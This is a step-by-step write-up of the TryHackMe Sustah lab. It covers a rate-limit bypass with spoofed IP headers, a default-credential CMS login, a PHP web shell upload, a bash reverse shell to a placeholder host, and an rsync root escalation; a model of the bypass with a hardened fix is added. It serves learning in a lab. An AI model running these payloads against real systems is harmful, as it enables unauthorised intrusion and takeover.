[Writeup TryHackMe: Sustah]
In this article I'll show, step by step, how I completed Sustah, a free Capture The Flag (CTF) room on TryHackMe.
On the machine's initial page I did not see anything interesting, so I decided to go straight ahead and run nmap.
As we can see, there are three services running, and one of them, on a high port, caught my attention. Browsing to that port we get the following page:
It's a roulette mini-game: I entered a value and got the message "Oh no! How unlucky. Spin the wheel and try again.", so I assumed the challenge was to win the game, which meant brute-forcing values until one hit.
But the brute-force attack was stopped by a rate limit. Searching, I found ways to bypass rate limiting by adding several IP-spoofing headers to the request; if the application derives the client address from any one of them, each request can claim a different source and the limiter never counts them under the same key. In Burp I used this setup:
First I sent the request to Burp Intruder and added these headers for the bypass:
• X-Forwarded-For: 127.0.0.1
• X-Forwarded-Host: 127.0.0.1
• X-Client-IP: 127.0.0.1
• X-Remote-IP: 127.0.0.1
• X-Remote-Addr: 127.0.0.1
• X-Host: 127.0.0.1
For the number payload I used 10000–99999; I chose that range thinking of the winning value, which has 5 digits. To make it easier, I wrote a small Python script to generate the wordlist:
with open('num.txt', 'w') as arq:
    # range() excludes its upper bound, so 100000 is needed to include 99999
    for x in range(10000, 100000):
        arq.write(str(x) + '\n')
To be sure I would spot the correct request, I created an Intruder filter (grep match) that flags the wrong responses; in other words, the right one is the response whose checkbox is not checked.
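To show why those headers defeat the limiter, here is an added example (not code from the room or from this writeup) that models a rate limiter in Python: one version resolves the client address from the spoofable headers, the other from the TCP peer address, and a simulated brute-force with rotating header values is run against both. The server logic, the limit of 10 attempts, and the attacker address 10.10.14.5 are assumptions made for the example.

```python
"""Model of the header-based rate-limit bypass used against the roulette game.

Added example, not code from the Sustah room or its author. The server side
is a constructed stand-in: it assumes the limiter keys attempts on a "client
IP" and that the vulnerable version trusts client-supplied proxy headers.
"""
from collections import defaultdict

# The headers added in Burp Intruder; an app that derives the client address
# from any of these lets the attacker choose the key the limiter counts under.
SPOOFABLE_HEADERS = [
    "X-Forwarded-For",
    "X-Forwarded-Host",
    "X-Client-IP",
    "X-Remote-IP",
    "X-Remote-Addr",
    "X-Host",
]


def client_ip_vulnerable(headers, peer_ip):
    """Flawed lookup: believe the first spoofable header that is present."""
    for name in SPOOFABLE_HEADERS:
        value = headers.get(name)
        if value:
            return value.split(",")[0].strip()
    return peer_ip


def client_ip_hardened(headers, peer_ip, trusted_proxies=frozenset()):
    """Use the TCP peer address unless it is a known proxy; only then take
    the address that proxy appended to X-Forwarded-For (the last entry)."""
    if peer_ip in trusted_proxies:
        xff = headers.get("X-Forwarded-For", "")
        hops = [h.strip() for h in xff.split(",") if h.strip()]
        if hops:
            return hops[-1]
    return peer_ip


class RateLimiter:
    """Counts attempts per key and allows at most `limit` per key."""

    def __init__(self, limit, resolve_ip):
        self.limit = limit
        self.resolve_ip = resolve_ip
        self.counts = defaultdict(int)

    def allow(self, headers, peer_ip):
        key = self.resolve_ip(headers, peer_ip)
        self.counts[key] += 1
        return self.counts[key] <= self.limit


def candidate_numbers():
    """Every 5-digit value, 10000..99999 inclusive (the Intruder payload)."""
    return range(10000, 100000)


def run_bruteforce(limiter, attempts, attacker_ip="10.10.14.5"):
    """Send `attempts` guesses from one real IP, rotating the spoofed header
    value each time so every request claims a fresh client. Returns how many
    guesses the limiter let through."""
    allowed = 0
    for i, number in enumerate(candidate_numbers()):
        if i >= attempts:
            break
        # 127.0.0.1 is what the writeup used; varying the last octet makes
        # each request claim a different source address.
        spoofed = f"127.0.0.{i % 250 + 1}"
        headers = {name: spoofed for name in SPOOFABLE_HEADERS}
        if limiter.allow(headers, attacker_ip):
            allowed += 1
    return allowed


if __name__ == "__main__":
    print(run_bruteforce(RateLimiter(10, client_ip_vulnerable), 1000))  # 1000
    print(run_bruteforce(RateLimiter(10, client_ip_hardened), 1000))    # 10
```

The vulnerable resolver lets all 1000 guesses through because each header value opens a new counter; the hardened one keys on the real peer address and stops after 10. The fix is not to strip the headers but to only trust X-Forwarded-For when the connection actually comes from a proxy you control.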
After finding the correct value, the game returned a directory of a web page on port 80.
We can see that this page is running a CMS called "Mara", but before searching for an exploit I decided to enumerate directories again (I had already done this at the beginning, but found nothing).
Of the directories I found, the one that most caught my attention was /log, because it had a login screen.
After that I didn't find anything else interesting in the directories, so I started looking for an exploit for Mara CMS.
First I chose the one that would give me a reverse shell.
The first step of the exploit was to try logging in with the default credentials:
admin:changeme
Once in, with CMS admin rights, I needed to upload my shell.
Shell file:
<?php system($_GET["cmd"]); ?>
After uploading the shell, the application tells you where to find it.
Now it is possible to run commands through the cmd parameter, so I caught a reverse shell. Because system() hands the command to /bin/sh, the one-liner has to be wrapped in bash -c, and the & and > characters must be URL-encoded in the query string or the command gets cut at the first &.
Command:
bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
Now, with a shell, I could explore further.
Searching around, I found a backup folder containing a hidden file with passwords.
One of them belonged to a system user and was stored in plaintext, so I tried logging in with it.
That gave me the user flag. Next I needed to escalate privileges to get the root flag, so I downloaded linpeas onto the machine and got the following result:
Following https://gtfobins.github.io I found a method to get root access using rsync: its -e option sets the program used as the remote shell, so an rsync run with root rights will execute whatever command is passed there.
I made a small change to the GTFOBins command to get root, and the final command looked like this:
doas -u root sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
With that I got the root flag and finished the CTF.
Thank you for your attention!